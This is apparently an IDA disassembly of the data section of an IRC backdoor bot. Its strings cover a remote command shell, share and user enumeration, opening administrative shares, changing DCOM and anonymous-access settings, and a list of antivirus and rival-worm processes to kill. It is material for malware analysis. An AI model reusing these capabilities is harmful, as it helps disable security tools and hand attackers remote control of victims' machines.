dd 2
dd offset aContinue_0 ; "Continue"
dd offset aContinued ; "Continued"
dd 3
dword_450EF4 dd 646441h ; DATA XREF: .data:off_450EA0�o
aAdded db 'Added',0 ; DATA XREF: .data:off_450EA4�o
align 10h
aDelete_1 db 'Delete',0 ; DATA XREF: .data:00450EAC�o
align 4
aDeleted db 'Deleted',0 ; DATA XREF: .data:00450EB0�o
aList_1 db 'List',0 ; DATA XREF: .data:00450EB8�o
align 4
aListed db 'Listed',0 ; DATA XREF: .data:00450EBC�o
align 10h
aStart_0 db 'Start',0 ; DATA XREF: .data:00450EC4�o
align 4
aStarted db 'Started',0 ; DATA XREF: .data:00450EC8�o
aStop_0 db 'Stop',0 ; DATA XREF: .data:00450ED0�o
align 4
aStopped_0 db 'Stopped',0 ; DATA XREF: .data:00450ED4�o
aPause_0 db 'Pause',0 ; DATA XREF: .data:00450EDC�o
align 4
aPaused_0 db 'Paused',0 ; DATA XREF: .data:00450EE0�o
align 10h
aContinue_0 db 'Continue',0 ; DATA XREF: .data:00450EE8�o
align 4
aContinued db 'Continued',0 ; DATA XREF: .data:00450EEC�o
align 4
; char asc_450F68[]
asc_450F68 db '-' ; DATA XREF: sub_4195C6+33�o
db 3, 34h, 2
db 6Eh ; n
db 65h, 74h, 2
db 3
aSServiceS db '- %s service: ',27h,'%s',27h,0
unk_450F84 db 2Dh ; - ; DATA XREF: sub_4195C6+51�o
db 3, 34h, 2
db 6Eh ; n
db 65h, 74h, 2
db 3
aErrorWithServi db '- error with service: ',27h,'%s',27h,' - %s',0
align 10h
; char asc_450FB0[]
asc_450FB0 db '-' ; DATA XREF: sub_4195C6+67�o
db 3, 34h, 2
db 6Eh ; n
db 65h, 74h, 2
db 3
aSNoServiceSpec db '- %s: no service specified',0
aTheSpecifiedDa db 'The specified database does not exist.',0
; DATA XREF: sub_4196E2:loc_4197BB�o
align 4
aTheHandleDoesN db 'The handle does not have the required access right.',0
; DATA XREF: sub_4196E2:loc_41973C�o
aTheSpecifiedSe db 'The specified service name is invalid.',0 ; DATA XREF: sub_4196E2+3C�o
align 4
aTheHandleIsInv db 'The handle is invalid.',0 ; DATA XREF: sub_4196E2:loc_419732�o
align 10h
aTheServiceBina db 'The service binary file could not be found.',0
; DATA XREF: sub_4196E2:loc_419746�o
aAnInstanceOfTh db 'An instance of the service is already running.',0
; DATA XREF: sub_4196E2:loc_419790�o
align 4
aTheDatabaseIsL db 'The database is locked.',0 ; DATA XREF: sub_4196E2+8F�o
aTheServiceDepe db 'The service depends on a service that does not exist or has been '
; DATA XREF: sub_4196E2:loc_4197C2�o
db 'marked for deletion.',0
align 4
aTheServiceDe_0 db 'The service depends on another service that has failed to start.',0
; DATA XREF: sub_4196E2:loc_4197C9�o
align 10h
aTheServiceHasB db 'The service has been disabled.',0 ; DATA XREF: sub_4196E2:loc_4197D0�o
align 10h
aTheSpecified_0 db 'The specified service does not exist.',0
; DATA XREF: sub_4196E2:loc_4197D7�o
align 4
aTheServiceCoul db 'The service could not be logged on. The account does not have the'
; DATA XREF: sub_4196E2:loc_4197DE�o
db ' correct access rights.',0
align 4
aTheServiceHa_0 db 'The service has been marked for deletion.',0
; DATA XREF: sub_4196E2:loc_4197E5�o
align 10h
aAThreadCouldNo db 'A thread could not be created for the service.',0
; DATA XREF: sub_4196E2:loc_41977B�o
align 10h
aTheProcessForT db 'The process for the service was started, but it did not call Star'
; DATA XREF: sub_4196E2:loc_419782�o
db 'tServiceCtrlDispatcher.',0
align 4
aTheServiceCann db 'The service cannot be stopped because other running services are '
; DATA XREF: sub_4196E2:loc_419750�o
db 'dependent on it.',0
align 10h
aTheRequestedCo db 'The requested control code is undefined.',0
; DATA XREF: sub_4196E2:loc_419728�o
align 4
aTheRequested_0 db 'The requested control code is not valid, or it is unacceptable to'
; DATA XREF: sub_4196E2:loc_419789�o
db ' the service.',0
align 4
aTheRequested_1 db 'The requested control code cannot be sent to the service because '
; DATA XREF: sub_4196E2:loc_4197EC�o
db 'the state of the service.',0
align 4
aTheServiceHasN db 'The service has not been started.',0 ; DATA XREF: sub_4196E2:loc_4197F3�o
align 4
; char aTheSystemIsShu[]
aTheSystemIsShu db 'The system is shutting down.',0 ; DATA XREF: sub_4196E2:loc_4197FA�o
align 4
; char aAnUnknownError[]
aAnUnknownError db 'An unknown error occurred: <%ld>',0 ; DATA XREF: sub_4196E2+12C�o
align 10h
aTheFollowingWi db 'The following Windows services are registered:',0
; DATA XREF: sub_419860+25�o
align 10h
; char aStopped[]
aStopped db ' Stopped',0 ; DATA XREF: sub_419860:loc_41992C�o
aStarting db ' Starting',0 ; DATA XREF: sub_419860:loc_419925�o
aStoping db ' Stoping',0 ; DATA XREF: sub_419860:loc_41991E�o
aRunning db ' Running',0 ; DATA XREF: sub_419860:loc_419917�o
aContinuing db ' Continuing',0 ; DATA XREF: sub_419860:loc_419910�o
aPausing db ' Pausing',0 ; DATA XREF: sub_419860:loc_419909�o
aPaused db ' Paused',0 ; DATA XREF: sub_419860:loc_419902�o
aUnknown_0 db ' Unknown',0 ; DATA XREF: sub_419860+9B�o
; char aSSS_2[]
aSSS_2 db '%s: %s (%s)',0 ; DATA XREF: sub_419860+EB�o
; char asc_45150C[]
asc_45150C db '-' ; DATA XREF: sub_41999D+8A�o
db 3, 34h, 2
dd 274656Eh, 25202D03h, 68732073h, 3A657261h, 73252720h
dd 27h
; char asc_451528[]
asc_451528 db '-' ; DATA XREF: sub_41999D+58�o
db 3, 34h, 2
db 6Eh ; n
db 65h, 74h, 2
db 3
aSErrorWithShar db '- %s: error with share: ',27h,'%s',27h,' - %s',0
align 4
; char asc_451554[]
asc_451554 db '-' ; DATA XREF: sub_41999D+AC�o
db 3, 34h, 2
db 6Eh ; n
db 65h, 74h, 2
db 3
aSNoShareSpecif db '- %s: no share specified',0
align 4
aShareNameResou db 'Share name: Resource: Uses: Desc:',0
; DATA XREF: sub_419B93+26�o
align 10h
aYes db 'Yes',0 ; DATA XREF: sub_419B93+B5�o
aNo db 'No',0 ; DATA XREF: sub_419B93+BC�o
align 4
; char a14s24s6u4s[]
a14s24s6u4s db '%-14S %-24S %-6u %-4s',0 ; DATA XREF: sub_419B93+D0�o
align 10h
; char asc_4515D0[]
asc_4515D0 db '-' ; DATA XREF: sub_419B93+76�o
db 3, 34h, 2
db 6Eh ; n
db 65h, 74h, 2
db 3
aShareListError db '- share list error %s <%ld>',0
align 4
; char asc_4515F8[]
asc_4515F8 db '-' ; DATA XREF: sub_419CB4+6D�o
db 3, 34h, 2
db 6Eh ; n
db 65h, 74h, 2
db 3
aSUsernameS db '- %s username: ',27h,'%s',27h,0
align 4
; char asc_451618[]
asc_451618 db '-' ; DATA XREF: sub_419CB4+95�o
db 3, 34h, 2
db 6Eh ; n
db 65h, 74h, 2
db 3
aSErrorWithUser db '- %s: error with username: ',27h,'%s',27h,' - %s',0
align 4
; char asc_451648[]
asc_451648 db '-' ; DATA XREF: sub_419CB4+B7�o
db 3, 34h, 2
db 6Eh ; n
db 65h, 74h, 2
db 3
aSNoUsernameSpe db '- %s: no username specified',0
align 10h
; char aAccountS[]
aAccountS db 'Account: %S',0 ; DATA XREF: sub_419DFB+50�o
; char aFullNameS[]
aFullNameS db 'Full Name: %S',0 ; DATA XREF: sub_419DFB+84�o
align 4
; char aUserCommentS[]
aUserCommentS db 'User Comment: %S',0 ; DATA XREF: sub_419DFB+AF�o
align 10h
; char aCommentS[]
aCommentS db 'Comment: %S',0 ; DATA XREF: sub_419DFB+DA�o
aGuest db 'Guest',0 ; DATA XREF: sub_419DFB:loc_419F1A�o
align 4
aUser_3 db 'User',0 ; DATA XREF: sub_419DFB:loc_419F13�o
align 4
aAdministrator db 'Administrator',0 ; DATA XREF: sub_419DFB:loc_419F0C�o
align 4
aUnknown_1 db 'Unknown',0 ; DATA XREF: sub_419DFB+10A�o
; char aPrivilegeLevel[]
aPrivilegeLevel db 'Privilege Level: %s',0 ; DATA XREF: sub_419DFB+12B�o
; char aAuthFlagsD[]
aAuthFlagsD db 'Auth Flags: %d',0 ; DATA XREF: sub_419DFB+156�o
align 4
; char aHomeDirectoryS[]
aHomeDirectoryS db 'Home Directory: %S',0 ; DATA XREF: sub_419DFB+181�o
align 4
; char aParametersS[]
aParametersS db 'Parameters: %S',0 ; DATA XREF: sub_419DFB+1AC�o
align 4
; char aPasswordAgeD[]
aPasswordAgeD db 'Password Age: %d',0 ; DATA XREF: sub_419DFB+1D7�o
align 10h
; char aBadPasswordCou[]
aBadPasswordCou db 'Bad Password Count: %d',0 ; DATA XREF: sub_419DFB+202�o
align 4
; char aNumberOfLogins[]
aNumberOfLogins db 'Number of Logins: %d',0 ; DATA XREF: sub_419DFB+22D�o
align 10h
; char aLastLogonD[]
aLastLogonD db 'Last Logon: %d',0 ; DATA XREF: sub_419DFB+258�o
align 10h
; char aLastLogoffD[]
aLastLogoffD db 'Last Logoff: %d',0 ; DATA XREF: sub_419DFB+283�o
; char aLogonServerS[]
aLogonServerS db 'Logon Server: %S',0 ; DATA XREF: sub_419DFB+2AE�o
align 4
; char aWorkstationsS[]
aWorkstationsS db 'Workstations: %S',0 ; DATA XREF: sub_419DFB+2D9�o
align 4
; char aCountryCodeD[]
aCountryCodeD db 'Country Code: %d',0 ; DATA XREF: sub_419DFB+304�o
align 4
; char aUserSLanguageD[]
aUserSLanguageD db 'User',27h,'s Language: %d',0 ; DATA XREF: sub_419DFB+32F�o
; char aMax_StorageD[]
aMax_StorageD db 'Max. Storage: %d',0 ; DATA XREF: sub_419DFB+35A�o
align 4
; char aUnitsPerWeekD[]
aUnitsPerWeekD db 'Units Per Week: %d',0 ; DATA XREF: sub_419DFB+385�o
align 4
; char asc_4517F8[]
asc_4517F8 db '-' ; DATA XREF: sub_419DFB+3AF�o
db 3, 34h, 2
db 6Eh ; n
db 65h, 74h, 2
db 3
aUserInfoErrorL db '- user info error <%ld>',0
align 4
aUsernameAccoun db 'Username accounts for local system:',0 ; DATA XREF: sub_41A1E4+29�o
; char asc_451840[]
asc_451840 db '-' ; DATA XREF: sub_41A1E4+F7�o
db 3, 34h, 2
db 6Eh ; n
db 65h, 74h, 2
db 3
aAnAccessViolat db '- an access violation has occured',0
align 4
; char aS_30[]
aS_30 db ' %S',0 ; DATA XREF: sub_41A1E4+BE�o
align 4
; char asc_451874[]
asc_451874 db '-' ; DATA XREF: sub_41A1E4+7A�o
db 3, 34h, 2
db 6Eh ; n
db 65h, 74h, 2
db 3
aUserListErrorS db '- user list error %s <%ld>',0
; char aTotalUsersFoun[]
aTotalUsersFoun db 'Total users found: %d.',0 ; DATA XREF: sub_41A1E4+14F�o
align 10h
aAccessDenied_ db 'Access denied.',0 ; DATA XREF: sub_41A364:loc_41A3C7�o
align 10h
aLevelParameter db 'Level parameter is invalid.',0 ; DATA XREF: sub_41A364:loc_41A408�o
aTheNameIsInval db 'The name is invalid.',0 ; DATA XREF: sub_41A364:loc_41A3D1�o
align 4
aInvalidParamet db 'Invalid parameter.',0 ; DATA XREF: sub_41A364+3B�o
align 4
aNotEnoughMemor db 'Not enough memory.',0 ; DATA XREF: sub_41A364:loc_41A3BD�o
align 4
aThisNetworkReq db 'This network request is not supported.',0
; DATA XREF: sub_41A364:loc_41A3B3�o
align 4
aServerNameNotF db 'Server name not found.',0 ; DATA XREF: sub_41A364:loc_41A3A9�o
align 4
aShareNotFound_ db 'Share not found.',0 ; DATA XREF: sub_41A364:loc_41A473�o
align 10h
aDuplicateShare db 'Duplicate share name.',0 ; DATA XREF: sub_41A364+89�o
align 4
aInvalidForRedi db 'Invalid for redirected resource.',0 ; DATA XREF: sub_41A364:loc_41A3F7�o
align 4
aDeviceOrDirect db 'Device or directory does not exist.',0
; DATA XREF: sub_41A364:loc_41A401�o
aTheComputerNam db 'The computer name is invalid.',0 ; DATA XREF: sub_41A364:loc_41A46C�o
align 10h
aTheOperationIs db 'The operation is allowed only on the primary domain controller of'
; DATA XREF: sub_41A364+CF�o
db ' the domain.',0
align 10h
aTheGroupAlread db 'The group already exists.',0 ; DATA XREF: sub_41A364:loc_41A441�o
align 4
aTheUserAccount db 'The user account already exists.',0 ; DATA XREF: sub_41A364:loc_41A43A�o
align 10h
aThePasswordIsS db 'The password is shorter than required (or does not meet the passw'
; DATA XREF: sub_41A364:loc_41A448�o
db 'ord policy requirement.)',0
align 4
; char aNetworkConnect[]
aNetworkConnect db 'Network connection not found.',0 ; DATA XREF: sub_41A364:loc_41A481�o
align 4
aAGeneralFailur db 'A general failure occurred in the network hardware.',0
; DATA XREF: sub_41A364:loc_41A40F�o
aTheUserNameCou db 'The user name could not be found.',0 ; DATA XREF: sub_41A364:loc_41A47A�o
align 4
aAnUnknownErr_0 db 'An unknown error occurred.',0 ; DATA XREF: sub_41A364:loc_41A465�o
align 10h
; char asc_451B70[]
asc_451B70 db '-' ; DATA XREF: sub_41A498+81�o
db 3, 34h, 2
db 6Eh ; n
db 65h, 74h, 2
db 3
aMessageSentSuc db '- message sent successfully',0
align 4
; char asc_451B98[]
asc_451B98 db '-' ; DATA XREF: sub_41A498+AB�o
db 3, 34h, 2
dd 274656Eh, 25202D03h, 34032073h, 76726553h, 3A037265h
dd 20532520h, 654D3403h, 67617373h, 203A0365h, 5325h
dword_451BC4 dd 7530h ; DATA XREF: sub_41A919+12�r
off_451BC8 dd offset aRegedit_exe ; DATA XREF: sub_41A5C1+CB�o
; "regedit.exe"
dd offset aMsconfig_exe ; "msconfig.exe"
dd offset aNetstat_exe ; "netstat.exe"
dd offset aMsblast_exe ; "msblast.exe"
dd offset aZapro_exe ; "zapro.exe"
dd offset aNavw32_exe ; "navw32.exe"
dd offset aNavapw32_exe ; "navapw32.exe"
dd offset aZonealarm_exe ; "zonealarm.exe"
dd offset aWincfg32_exeta ; "wincfg32.exetaskmon.exe"
dd offset aPandaavengine_ ; "PandaAVEngine.exe"
dd offset aSysinfo_exe ; "sysinfo.exe"
dd offset aMscvb32_exe ; "mscvb32.exe"
dd offset aMsblast_exe_0 ; "MSBLAST.exe"
dd offset aTeekids_exe ; "teekids.exe"
dd offset aPenis32_exe ; "Penis32.exe"
dd offset aBbeagle_exe ; "bbeagle.exe"
dd offset aSysmonxp_exe ; "SysMonXP.exe"
dd offset aWinupd_exe ; "winupd.exe"
dd offset aWinsys_exe ; "winsys.exe"
dd offset aSsate_exe ; "ssate.exe"
dd offset aRate_exe ; "rate.exe"
dd offset aD3dupdate_exe ; "d3dupdate.exe"
dd offset aIrun4_exe ; "irun4.exe"
dd offset aI11r54n4_exe ; "i11r54n4.exe"
aRegedit_exe db 'regedit.exe',0 ; DATA XREF: sub_41A5C1+EC�o
; .data:off_451BC8�o
aMsconfig_exe db 'msconfig.exe',0 ; DATA XREF: .data:00451BCC�o
align 4
aNetstat_exe db 'netstat.exe',0 ; DATA XREF: .data:00451BD0�o
aMsblast_exe db 'msblast.exe',0 ; DATA XREF: .data:00451BD4�o
aZapro_exe db 'zapro.exe',0 ; DATA XREF: .data:00451BD8�o
align 4
aNavw32_exe db 'navw32.exe',0 ; DATA XREF: .data:00451BDC�o
align 4
aNavapw32_exe db 'navapw32.exe',0 ; DATA XREF: .data:00451BE0�o
align 4
aZonealarm_exe db 'zonealarm.exe',0 ; DATA XREF: .data:00451BE4�o
align 4
aWincfg32_exeta db 'wincfg32.exetaskmon.exe',0 ; DATA XREF: .data:00451BE8�o
aPandaavengine_ db 'PandaAVEngine.exe',0 ; DATA XREF: .data:00451BEC�o
align 10h
aSysinfo_exe db 'sysinfo.exe',0 ; DATA XREF: .data:00451BF0�o
aMscvb32_exe db 'mscvb32.exe',0 ; DATA XREF: .data:00451BF4�o
aMsblast_exe_0 db 'MSBLAST.exe',0 ; DATA XREF: .data:00451BF8�o
aTeekids_exe db 'teekids.exe',0 ; DATA XREF: .data:00451BFC�o
aPenis32_exe db 'Penis32.exe',0 ; DATA XREF: .data:00451C00�o
aBbeagle_exe db 'bbeagle.exe',0 ; DATA XREF: .data:00451C04�o
aSysmonxp_exe db 'SysMonXP.exe',0 ; DATA XREF: .data:00451C08�o
align 4
aWinupd_exe db 'winupd.exe',0 ; DATA XREF: .data:00451C0C�o
align 4
aWinsys_exe db 'winsys.exe',0 ; DATA XREF: .data:00451C10�o
align 10h
aSsate_exe db 'ssate.exe',0 ; DATA XREF: .data:00451C14�o
align 4
aRate_exe db 'rate.exe',0 ; DATA XREF: .data:00451C18�o
align 4
aD3dupdate_exe db 'd3dupdate.exe',0 ; DATA XREF: .data:00451C1C�o
align 4
aIrun4_exe db 'irun4.exe',0 ; DATA XREF: .data:00451C20�o
align 4
aI11r54n4_exe db 'i11r54n4.exe',0 ; DATA XREF: .data:00451C24�o
align 4
aSedebugprivi_1 db 'SeDebugPrivilege',0 ; DATA XREF: sub_41A5C1+5A�o
align 4
aSD_0 db ' %s (%d)',0 ; DATA XREF: sub_41A5C1+17D�o
align 4
aSD_1 db ' %s (%d)',0 ; DATA XREF: sub_41A5C1+18B�o
align 10h
; char aSD_2[]
aSD_2 db ' %s (%d)',0 ; DATA XREF: sub_41A5C1+19F�o
align 4
aSedebugprivi_2 db 'SeDebugPrivilege',0 ; DATA XREF: sub_41A5C1+207�o
align 10h
; char asc_451DC0[]
asc_451DC0 db '-' ; DATA XREF: sub_41A804+19�o
db 3, 34h, 2
db 70h ; p
db 72h, 6Fh, 63h
db 73h ; s
db 2, 3, 2Dh
aListingProcess db ' listing processes:',0
unk_451DE0 db 2Dh ; - ; DATA XREF: sub_41A804+80�o
db 3, 34h, 2
db 70h ; p
db 72h, 6Fh, 63h
db 73h ; s
db 2, 3, 2Dh
aProcessListCom db ' process list complete',0
align 4
; char asc_451E04[]
asc_451E04 db '-' ; DATA XREF: sub_41A804:loc_41A88B�o
db 3, 34h, 2
db 70h ; p
db 72h, 6Fh, 63h
db 73h ; s
db 2, 3, 2Dh
aProcessListFai db ' process list failed',0
align 4
; char aPrivmsgSS_4[]
aPrivmsgSS_4 db 'PRIVMSG %s :%s',0Dh,0 ; DATA XREF: sub_41A9A1+33�o
; char aS_31[]
aS_31 db '%s',0 ; DATA XREF: sub_41A9A1+4C�o
align 4
unk_451E3C db 2Dh ; - ; DATA XREF: sub_41AA28:loc_41AB0E�o
db 3, 34h, 2
db 63h ; c
db 6Dh, 64h, 2
db 3
aCouldNotReadDa db '- Could not read data from proccess',0Dh,0Ah,0
align 4
unk_451E6C db 2Dh ; - ; DATA XREF: sub_41AA28+10F�o
db 3, 34h, 2
db 63h ; c
db 6Dh, 64h, 2
db 3
aProccessHasTer db '- Proccess has terminated.',0Dh,0Ah,0
align 4
unk_451E94 db 2Dh ; - ; DATA XREF: sub_41AA28:loc_41AB5A�o
db 3, 34h, 2
db 63h ; c
db 6Dh, 64h, 2
db 3
aCouldNotRead_0 db '- Could not read data from proccess.',0Dh,0Ah,0
aCmd_exe_0 db 'cmd.exe',0 ; DATA XREF: sub_41AB7D+20�o
; char asc_451ECC[]
asc_451ECC db '-' ; DATA XREF: sub_41AB7D+150�o
db 3, 34h, 2
db 63h ; c
db 6Dh, 64h, 2
db 3
aRemoteCommandP db '- Remote Command Prompt',0
align 10h
; char asc_451EF0[]
asc_451EF0 db '-' ; DATA XREF: sub_41AB7D+198�o
db 3, 34h, 2
db 63h ; c
db 6Dh, 64h, 2
db 3
aFailedToStartI db '- Failed to start IO thread, error: <%d>.',0
align 8
off_451F28 dd offset aIpc ; DATA XREF: sub_41AD95+1B3�o
; sub_41B0B9+179�o
; "IPC$"
align 10h
dd offset aAdmin_1 ; "ADMIN$"
align 8
off_451F38 dd offset aC_6 ; DATA XREF: sub_41B0B9+1E1�o
; "C$"
dd offset aC_7 ; "C:\\"
dd offset aD_3 ; "D$"
dd offset aD_4 ; "D:\\"
aIpc db 'IPC$',0 ; DATA XREF: sub_41AD95+217�o
; .data:off_451F28�o
align 10h
aAdmin_1 db 'ADMIN$',0 ; DATA XREF: .data:00451F30�o
align 4
aC_6 db 'C$',0 ; DATA XREF: .data:off_451F38�o
align 4
aC_7 db 'C:\',0 ; DATA XREF: .data:00451F3C�o
aD_3 db 'D$',0 ; DATA XREF: .data:00451F40�o
align 4
aD_4 db 'D:\',0 ; DATA XREF: .data:00451F44�o
word_451F68 dw 4Eh ; DATA XREF: sub_41AD95+38�r
align 4
aEnabledcom db 'EnableDCOM',0 ; DATA XREF: sub_41AD95+54�o
align 4
dword_451F78 dd 234032Dh, 75636573h, 3026572h ; DATA XREF: sub_41AD95+66�o
aDisableDcomFai db '- Disable DCOM failed.',0
align 4
; char asc_451F9C[]
asc_451F9C db '-' ; DATA XREF: sub_41AD95:loc_41AE02�o
db 3, 34h, 2
dd 75636573h, 3026572h, 4344202Dh, 64204D4Fh, 62617369h
dd 2E64656Ch, 0
; char asc_451FBC[]
asc_451FBC db '-' ; DATA XREF: sub_41AD95+91�o
db 3, 34h, 2
dd 75636573h, 3026572h
aFailedToOpenDc db '- Failed to open DCOM registry key.',0
aRestrictanonym db 'restrictanonymous',0 ; DATA XREF: sub_41AD95+ED�o
align 10h
dword_452000 dd 234032Dh, 75636573h, 3026572h ; DATA XREF: sub_41AD95+106�o
aFailedToRestri db '- Failed to restrict access to the IPC$ Share.',0
align 4
; char asc_45203C[]
asc_45203C db '-' ; DATA XREF: sub_41AD95:loc_41AEA2�o
db 3, 34h, 2
dd 75636573h, 3026572h
aRestrictedAcce db '- Restricted access to the IPC$ Share.',0
align 10h
dword_452070 dd 234032Dh, 75636573h, 3026572h ; DATA XREF: sub_41AD95:loc_41AEC0�o
aFailedToOpenIp db '- Failed to open IPC$ Restriction registry key.',0
; char asc_4520AC[]
asc_4520AC db '-' ; DATA XREF: sub_41AD95:loc_41AEC7�o
db 3, 34h, 2
dd 75636573h, 3026572h
aAdvapi32_dllCo db '- Advapi32.dll couldn',27h,'t be loaded.',0
align 4
dword_4520DC dd 234032Dh, 75636573h, 3026572h ; DATA XREF: sub_41AD95+25B�o
aShareSDeleted_ db '- Share ',27h,'%S',27h,' deleted.',0
align 10h
; char asc_452100[]
asc_452100 db '-' ; DATA XREF: sub_41AD95:loc_41AFF7�o
db 3, 34h, 2
dd 75636573h, 3026572h
aFailedToDelete db '- Failed to delete ',27h,'%S',27h,' share.',0
align 4
dword_45212C dd 234032Dh, 75636573h, 3026572h ; DATA XREF: sub_41AD95+1C8�o
aShareSDelete_0 db '- Share ',27h,'%s',27h,' deleted.',0
align 10h
; char asc_452150[]
asc_452150 db '-' ; DATA XREF: sub_41AD95:loc_41AF64�o
db 3, 34h, 2
dd 75636573h, 3026572h
aFailedToDele_0 db '- Failed to delete ',27h,'%s',27h,' share.',0
align 4
; char asc_45217C[]
asc_45217C db '-' ; DATA XREF: sub_41AD95+2CF�o
db 3, 34h, 2
dd 75636573h, 3026572h
aNetworkSharesD db '- Network shares deleted.',0
align 4
; char asc_4521A4[]
asc_4521A4 db '-' ; DATA XREF: sub_41AD95+2E5�o
db 3, 34h, 2
dd 75636573h, 3026572h
aNetapi32_dllCo db '- Netapi32.dll couldn',27h,'t be loaded.',0
align 4
word_4521D4 dw 59h ; DATA XREF: sub_41B0B9+38�r
align 4
aEnabledcom_0 db 'EnableDCOM',0 ; DATA XREF: sub_41B0B9+54�o
align 4
dword_4521E4 dd 234032Dh, 75636573h, 3026572h ; DATA XREF: sub_41B0B9+66�o
aEnableDcomFail db '- Enable DCOM failed.',0
align 4
; char asc_452208[]
asc_452208 db '-' ; DATA XREF: sub_41B0B9:loc_41B126�o
db 3, 34h, 2
dd 75636573h, 3026572h, 4344202Dh, 65204D4Fh, 6C62616Eh
dd 2E6465h
; char asc_452224[]
asc_452224 db '-' ; DATA XREF: sub_41B0B9+91�o
db 3, 34h, 2
dd 75636573h, 3026572h
aFailedToOpen_1 db '- Failed to open DCOM registry key.',0
aRestrictanon_0 db 'restrictanonymous',0 ; DATA XREF: sub_41B0B9+ED�o
align 4
dword_452268 dd 234032Dh, 75636573h, 3026572h ; DATA XREF: sub_41B0B9+102�o
aFailedToUnrest db '- Failed to unrestrict access to the IPC$ Share.',0
align 4
; char asc_4522A8[]
asc_4522A8 db '-' ; DATA XREF: sub_41B0B9:loc_41B1C2�o
db 3, 34h, 2
dd 75636573h, 3026572h
aUnrestrictedAc db '- Unrestricted access to the IPC$ Share.',0
align 10h
dword_4522E0 dd 234032Dh, 75636573h, 3026572h ; DATA XREF: sub_41B0B9:loc_41B1E0�o
aFailedToOpen_2 db '- Failed to open IPC$ restriction registry key.',0
; char asc_45231C[]
asc_45231C db '-' ; DATA XREF: sub_41B0B9:loc_41B1E7�o
db 3, 34h, 2
dd 75636573h, 3026572h
aAdvapi32_dll_0 db '- Advapi32.dll couldn',27h,'t be loaded.',0
align 4
dword_45234C dd 234032Dh, 75636573h, 3026572h ; DATA XREF: sub_41B0B9+192�o
aShareSAdded_ db '- Share ',27h,'%s',27h,' added.',0
; char asc_45236C[]
asc_45236C db '-' ; DATA XREF: sub_41B0B9:loc_41B252�o
db 3, 34h, 2
dd 75636573h, 3026572h
aFailedToAddSSh db '- Failed to add ',27h,'%s',27h,' share.',0
; char aC_1[]
aC_1 db '%c$',0 ; DATA XREF: sub_41B0B9+216�o
; char aC_0[]
aC_0 db '%c:\',0 ; DATA XREF: sub_41B0B9+22D�o
align 10h
dword_4523A0 dd 234032Dh, 75636573h, 3026572h ; DATA XREF: sub_41B0B9+266�o
aShareSAdded__0 db '- Share ',27h,'%s',27h,' added.',0
; char asc_4523C0[]
asc_4523C0 db '-' ; DATA XREF: sub_41B0B9:loc_41B326�o
db 3, 34h, 2
dd 75636573h, 3026572h
aFailedToAddS_0 db '- Failed to add ',27h,'%s',27h,' share.',0
; char asc_4523E8[]
asc_4523E8 db '-' ; DATA XREF: sub_41B0B9+2C3�o
db 3, 34h, 2
dd 75636573h, 3026572h
aNetworkSharesA db '- Network shares added.',0
; char asc_45240C[]
asc_45240C db '-' ; DATA XREF: sub_41B0B9+2DB�o
db 3, 34h, 2
dd 75636573h, 3026572h
aNetapi32_dll_1 db '- Netapi32.dll couldn',27h,'t be loaded.',0
align 4
; char aPostHttp1_0Hos[]
aPostHttp1_0Hos db 'POST / HTTP/1.0',0Dh,0Ah ; DATA XREF: sub_41B3ED+E1�o
db 'Host: %s',0Dh,0Ah
db 'Content-Length: %d',0Dh,0Ah
db 0Dh,0Ah,0
align 10h
; char asc_452470[]
asc_452470 db 0Dh,0Ah,0 ; DATA XREF: sub_41B3ED+F5�o
align 4
aWww_schlund_ne db 'www.schlund.net',0 ; DATA XREF: sub_41B5CA+15�o
aWww_utwente_nl db 'www.utwente.nl',0 ; DATA XREF: sub_41B5CA+1C�o
align 4
aVerio_fr db 'verio.fr',0 ; DATA XREF: sub_41B5CA+23�o
align 10h
aWww_1und1_de db 'www.1und1.de',0 ; DATA XREF: sub_41B5CA+2A�o
align 10h
aWww_switch_ch db 'www.switch.ch',0 ; DATA XREF: sub_41B5CA+31�o
align 10h
aWww_belwue_de db 'www.belwue.de',0 ; DATA XREF: sub_41B5CA+38�o
align 10h
aDe_yahoo_com db 'de.yahoo.com',0 ; DATA XREF: sub_41B5CA+3F�o
align 10h
aWww_google_it db 'www.google.it',0 ; DATA XREF: sub_41B5CA+46�o
align 10h
aWww_xo_net db 'www.xo.net',0 ; DATA XREF: sub_41B5CA+4D�o
align 4
aWww_stanford_e db 'www.stanford.edu',0 ; DATA XREF: sub_41B5CA+54�o
align 10h
aWww_verio_com db 'www.verio.com',0 ; DATA XREF: sub_41B5CA+5B�o
align 10h
aWww_nocster_co db 'www.nocster.com',0 ; DATA XREF: sub_41B5CA+62�o
aWww_rit_edu db 'www.rit.edu',0 ; DATA XREF: sub_41B5CA+69�o
aWww_cogentco_c db 'www.cogentco.com',0 ; DATA XREF: sub_41B5CA+70�o
align 10h
aWww_burst_net db 'www.burst.net',0 ; DATA XREF: sub_41B5CA+77�o
align 10h
aNitro_ucsc_edu db 'nitro.ucsc.edu',0 ; DATA XREF: sub_41B5CA+7E�o
align 10h
aWww_level3_com db 'www.level3.com',0 ; DATA XREF: sub_41B5CA+85�o
align 10h
aWww_above_net db 'www.above.net',0 ; DATA XREF: sub_41B5CA+8C�o
align 10h
aWww_easynews_c db 'www.easynews.com',0 ; DATA XREF: sub_41B5CA+93�o
align 4
aWww_google_com db 'www.google.com',0 ; DATA XREF: sub_41B5CA+9A�o
align 4
aWww_lib_nthu_e db 'www.lib.nthu.edu.tw',0 ; DATA XREF: sub_41B5CA+A1�o
aWww_st_lib_kei db 'www.st.lib.keio.ac.jp',0 ; DATA XREF: sub_41B5CA+A8�o
align 10h
aWww_d1asia_com db 'www.d1asia.com',0 ; DATA XREF: sub_41B5CA+AF�o
align 10h
aWww_nifty_com db 'www.nifty.com',0 ; DATA XREF: sub_41B5CA+B6�o
align 10h
aYahoo_co_jp db 'yahoo.co.jp',0 ; DATA XREF: sub_41B5CA+BD�o
aWww_google_co_ db 'www.google.co.jp',0 ; DATA XREF: sub_41B5CA+C4�o
align 10h
; char asc_452620[]
asc_452620 db '-' ; DATA XREF: sub_41B5CA+1A7�o
db 3, 34h, 2
dd 65657073h, 73657464h, 2D030274h, 75450220h, 65706F72h
dd 25203A02h, 626B2064h, 732F7469h, 53550220h, 203A0241h
dd 6B206425h, 2F746962h, 41022073h, 2616973h, 6425203Ah
dd 69626B20h, 20732F74h, 65764102h, 65676172h, 25203A02h
dd 626B2064h, 732F7469h, 0
; char aDdDhDm[]
aDdDhDm db '%dd %dh %dm',0 ; DATA XREF: sub_41B7A7+52�o
a95_0 db '95',0 ; DATA XREF: sub_41B964+46�o
align 10h
aNt_0 db 'NT',0 ; DATA XREF: sub_41B964+5A�o
align 4
a98_0 db '98',0 ; DATA XREF: sub_41B964+6C�o
